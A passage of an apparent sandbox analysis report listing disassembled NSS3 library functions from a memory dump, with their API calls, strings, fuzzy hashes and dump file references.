Opcode Fuzzy Hash: 0d13176e34e052fd6c9b21acb279ad60eac6435ad2db25299466b0f63c1e2e67
Instruction Fuzzy Hash: 6E11EBB2E003445AFB0056E46D81BBB35589B4175CF0D4036ED099BB42F722D9DED2F2

Function 6CA82E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA82CDA,?,00000000), ref: 6CA82E1E

Part of subcall function 6CADFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA89003,?), ref: 6CADFD91
Part of subcall function 6CADFD80: PORT_Alloc_Util.NSS3(A4686CAE,?), ref: 6CADFDA2
Part of subcall function 6CADFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAE,?,?), ref: 6CADFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CA82E33

Part of subcall function 6CADFD80: free.MOZGLUE(00000000,?,?), ref: 6CADFDD1

TlsGetValue.KERNEL32 ref: 6CA82E4E
EnterCriticalSection.KERNEL32(?), ref: 6CA82E5E
PL_HashTableLookup.NSS3(?), ref: 6CA82E71
PL_HashTableRemove.NSS3(?), ref: 6CA82E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CA82E96
PR_Unlock.NSS3 ref: 6CA82EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA82EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA82EC5

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: a26374134a42875a9218047e6ba90df278271755e662d7e04aaf2fc282848b15
Instruction ID: bb447c8d0cfce2ef9c8a5b703b8c35cda35f86b7354f51ca939923efd65958e4
Opcode Fuzzy Hash: a26374134a42875a9218047e6ba90df278271755e662d7e04aaf2fc282848b15
Instruction Fuzzy Hash: 4421F576A00105A7EF105F24AD09EAB3B79EF4639DF080130ED1883752FB32D5A8D6A2

Function 6CA0CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA0B999), ref: 6CA0CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA0B999), ref: 6CA0D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CA0B999), ref: 6CA0D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA0B999), ref: 6CB5972B

Strings

database corruption, xrefs: 6CA0CFE7, 6CA0D013, 6CA0D028, 6CA0D039, 6CA0D03E, 6CB59786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0CFDD, 6CA0D00E, 6CA0D022, 6CA0D033, 6CB59780
%s at line %d of [%.10s], xrefs: 6CA0CFEC, 6CA0D018, 6CA0D029, 6CA0D03F, 6CB5978B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 90e03039f681951999083db5bf8990d88443fa84acb38c9f8263be9056eafc04
Instruction ID: b16c52dfb7cc703b0aaa81b13609e2281c288cedd3f17c955d0e19ef7d285a89
Opcode Fuzzy Hash: 90e03039f681951999083db5bf8990d88443fa84acb38c9f8263be9056eafc04
Instruction Fuzzy Hash: 94615971A002508FD710CF29C840BA6B7F5EF55358F68416EE449AFB82D376D887C7A2

Function 6CB0EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6CB2A4A1,?,00000000,?,00000001), ref: 6CB0EF6D

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

htonl.WSOCK32(00000000,?,6CB2A4A1,?,00000000,?,00000001), ref: 6CB0EFE4
htonl.WSOCK32(?,00000000,?,6CB2A4A1,?,00000000,?,00000001), ref: 6CB0EFF1
memcpy.VCRUNTIME140(?,?,6CB2A4A1,?,00000000,?,6CB2A4A1,?,00000000,?,00000001), ref: 6CB0F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CB2A4A1,?,00000000,?,00000001), ref: 6CB0F027

Strings

dtls13, xrefs: 6CB0EF33

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: d96af54fbbe221c8cbb345b34f312df289ccb2c5a26555f2cbb560fb26e6603d
Instruction ID: 5ac50ba41d111a263cca67f055d48b2860e491c6d6ecb16bb711702274e826fb
Opcode Fuzzy Hash: d96af54fbbe221c8cbb345b34f312df289ccb2c5a26555f2cbb560fb26e6603d
Instruction Fuzzy Hash: 8531F371A002919FDB10DF28CC40B8EBBE8FF49348F158029E9589B751E731E915CBE6

Function 6CA8AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA8AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBA9500,6CA83F91), ref: 6CA8AFD2

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

DER_GetInteger_Util.NSS3(?), ref: 6CA8B007

Part of subcall function 6CAD6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CA81666,?,6CA8B00C,?), ref: 6CAD6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CA8B02F
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CA8B046
PL_FreeArenaPool.NSS3 ref: 6CA8B058
PL_FinishArenaPool.NSS3 ref: 6CA8B060

Strings

security, xrefs: 6CA8AFB8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 61b34771fac444c0dde784124b74afd3e42d681bb7d8767a4f4c41c39bb04a78
Instruction ID: 7a03d8a150663c7ba7f8441bd8797996a44c2362671092632d70eade05e2cf36
Opcode Fuzzy Hash: 61b34771fac444c0dde784124b74afd3e42d681bb7d8767a4f4c41c39bb04a78
Instruction Fuzzy Hash: 5A3147704053009BDB108F24EC45BAA77B4AF8A36CF140B19E9B49BBD1E732928DC797

Function 6CAB2BF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismInfo), ref: 6CAB2C0C
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAB2C27

Part of subcall function 6CB909D0: PR_Now.NSS3 ref: 6CB90A22
Part of subcall function 6CB909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB90A35
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB90A66
Part of subcall function 6CB909D0: PR_GetCurrentThread.NSS3 ref: 6CB90A70
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB90A9D
Part of subcall function 6CB909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB90AC8
Part of subcall function 6CB909D0: PR_vsmprintf.NSS3(?,?), ref: 6CB90AE8
Part of subcall function 6CB909D0: EnterCriticalSection.KERNEL32(?), ref: 6CB90B19
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90B48
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90C76
Part of subcall function 6CB909D0: PR_LogFlush.NSS3 ref: 6CB90C7E

PR_LogPrint.NSS3( type = 0x%x,?), ref: 6CAB2C40

Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90B88
Part of subcall function 6CB909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB90C5D
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB90C8D
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90C9C
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90CD1
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90CEC
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90CFB
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90D16
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB90D26
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D35
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB90D65
Part of subcall function 6CB909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB90D70
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90D90
Part of subcall function 6CB909D0: free.MOZGLUE(00000000), ref: 6CB90D99

PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6CAB2C59

Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90BAB
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90BBA
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D7E

Strings

type = 0x%x, xrefs: 6CAB2C3B
slotID = 0x%x, xrefs: 6CAB2C22
C_GetMechanismInfo, xrefs: 6CAB2C07
pInfo = 0x%p, xrefs: 6CAB2C54

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Printfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: pInfo = 0x%p$ slotID = 0x%x$ type = 0x%x$C_GetMechanismInfo
API String ID: 2688868551-112346095
Opcode ID: 1d7d2e5831548bf7ee5e73eb871f7317b8c78736543475af35dfc887418fd48f
Instruction ID: 3e84976e39cd77e08048a80c7fb69f09b82863746afa8adb415e8091bf34d3f0
Opcode Fuzzy Hash: 1d7d2e5831548bf7ee5e73eb871f7317b8c78736543475af35dfc887418fd48f
Instruction Fuzzy Hash: C221E7752001859FDB408F54EE8CA493B79EB8B769F084026E904E3711CF31DD88DBA2

Function 6CACCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CACCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CACCE16
PR_SetError.NSS3(00000000,00000000), ref: 6CACD079

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 1aacaa3797f793b07200c4757dda59a83f9114affde17e4fbea456176ba2f6d7
Instruction ID: 8aa5bdfef3226c0c5a948e741212a25ae01ab1688b62a9dc4d9ee9a70e96d2ce
Opcode Fuzzy Hash: 1aacaa3797f793b07200c4757dda59a83f9114affde17e4fbea456176ba2f6d7
Instruction Fuzzy Hash: 75C17FB1E002199BDB10DF28CC80BDAB7B4BB49318F1441A8E949A7741E775EED9CF91

Function 6CA82C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(1EE240A8), ref: 6CA82C5D

Part of subcall function 6CAE0D30: calloc.MOZGLUE ref: 6CAE0D50
Part of subcall function 6CAE0D30: TlsGetValue.KERNEL32 ref: 6CAE0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA82C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA82CE0

Part of subcall function 6CA82E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA82CDA,?,00000000), ref: 6CA82E1E
Part of subcall function 6CA82E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA82E33
Part of subcall function 6CA82E00: TlsGetValue.KERNEL32 ref: 6CA82E4E
Part of subcall function 6CA82E00: EnterCriticalSection.KERNEL32(?), ref: 6CA82E5E
Part of subcall function 6CA82E00: PL_HashTableLookup.NSS3(?), ref: 6CA82E71
Part of subcall function 6CA82E00: PL_HashTableRemove.NSS3(?), ref: 6CA82E84
Part of subcall function 6CA82E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA82E96
Part of subcall function 6CA82E00: PR_Unlock.NSS3 ref: 6CA82EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA82D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA82D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CA82D3F
free.MOZGLUE(00000000), ref: 6CA82D73
CERT_DestroyCertificate.NSS3(?), ref: 6CA82DB8
free.MOZGLUE ref: 6CA82DC8

Part of subcall function 6CA83E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA83EC2
Part of subcall function 6CA83E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA83ED6
Part of subcall function 6CA83E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA83EEE
Part of subcall function 6CA83E60: PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CA83F02
Part of subcall function 6CA83E60: PL_FreeArenaPool.NSS3 ref: 6CA83F14
Part of subcall function 6CA83E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA83F27

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 3409ef3ccf80b8af57b50798fd2bfcd4dc2e52cff67cfa329d442cc66a8d131e
Instruction ID: 0032243a549ea0a79f276be01f5cad810f9cd48a03c4d5a0611f7afca8b4b93b
Opcode Fuzzy Hash: 3409ef3ccf80b8af57b50798fd2bfcd4dc2e52cff67cfa329d442cc66a8d131e
Instruction Fuzzy Hash: E651D171A062119FEB019E25DD89B6B7BE5EF84348F18062CEC5983750E731E899CB92

Function 6CAA8F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAA9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAA9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAA9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAA90EC

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAA9111

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 8f76c557c5dcdfe97923228ca6f607c191cc9124486a2d37cda46bf5562c2b60
Instruction ID: fbbc96a6cacf5743d65c45185b28a6c18efc4803cb5780418306fce7a64b4b0a
Opcode Fuzzy Hash: 8f76c557c5dcdfe97923228ca6f607c191cc9124486a2d37cda46bf5562c2b60
Instruction Fuzzy Hash: 8851BC74A046558FDF40EFB8C588259BBF4BF0A354F094569DC448B706EB36E8CACB92

Function 6CA88980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6CA87310), ref: 6CA889B8

Part of subcall function 6CAE1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA888A4,00000000,00000000), ref: 6CAE1228
Part of subcall function 6CAE1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CAE1238
Part of subcall function 6CAE1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA888A4,00000000,00000000), ref: 6CAE124B
Part of subcall function 6CAE1200: PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0,00000000,00000000,00000000,?,6CA888A4,00000000,00000000), ref: 6CAE125D
Part of subcall function 6CAE1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CAE126F
Part of subcall function 6CAE1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CAE1280
Part of subcall function 6CAE1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CAE128E
Part of subcall function 6CAE1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CAE129A
Part of subcall function 6CAE1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CAE12A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6CA87310), ref: 6CA889E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6CA88A00
CERT_CopyRDN.NSS3(00000004,00000000,6CA87310,?,?,00000004,?), ref: 6CA88A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6CA88A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6CA87310), ref: 6CA88AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6CA87310), ref: 6CA88AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6CA87310), ref: 6CA88B1D

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: 3eb94b7e1582514b2c48767add8e19f9f188d796fc4cd6391a49f5d5d71d5aa3
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: D1511871A02314AFE7108F10CC44B6EB7A4EF4671CF1A815AED189B7D1EB35E985CB91

Function 6CAF0B00 Relevance: 13.6, APIs: 9, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAF0B21

Part of subcall function 6CADBE30: SECOID_FindOID_Util.NSS3(6CA9311B,00000000,?,6CA9311B,?), ref: 6CADBE44

Part of subcall function 6CAC8500: SECOID_GetAlgorithmTag_Util.NSS3(6CAC95DC,00000000,00000000,00000000,?,6CAC95DC,00000000,00000000,?,6CAA7F4A,00000000,?,00000000,00000000), ref: 6CAC8517

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAF0B64

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAF0B72
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CAF0BA1
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CAF0BB1
PK11_CreateContextBySymKey.NSS3(-00000001,00000105,?,?), ref: 6CAF0BF3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAF0C00

Part of subcall function 6CAC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAA7F4A,00000000,?,00000000,00000000), ref: 6CAC95E0
